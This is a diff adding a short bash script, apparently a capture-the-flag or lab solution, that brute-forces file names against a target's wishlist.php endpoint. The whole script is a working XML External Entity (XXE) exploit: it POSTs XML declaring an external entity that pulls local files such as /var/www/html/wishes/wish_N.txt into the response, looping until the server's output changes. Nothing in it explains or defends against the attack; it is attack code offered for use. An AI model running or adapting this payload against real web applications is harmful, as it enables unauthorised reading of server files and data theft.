batman

5/wishes.sh

@@ -0,0 +1,23 @@
+#!/bin/bash
+target=`cat trgt`
+opts="-sH 'Content-Type: application/xml'"
+declare -i i=1
+#i=20
+while [ $i -gt 0 ]; do
+	echo "Trying wish_$i.txt..."
+	p="<!--?xml version='1.0' ?-->
+<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_$i.txt'> ]>
+<wishlist>
+  <user_id>1</user_id>
+     <item>
+       <product_id>&payload;</product_id>
+     </item>
+</wishlist>"
+	out=`curl $opts http://$target/wishlist.php -d "$p"`
+	echo "$out"
+	echo "$out" | grep -q 'Failed to parse XML'
+	[ $? -eq 0 ] && break;
+	sleep 1
+	i+=1
+done
+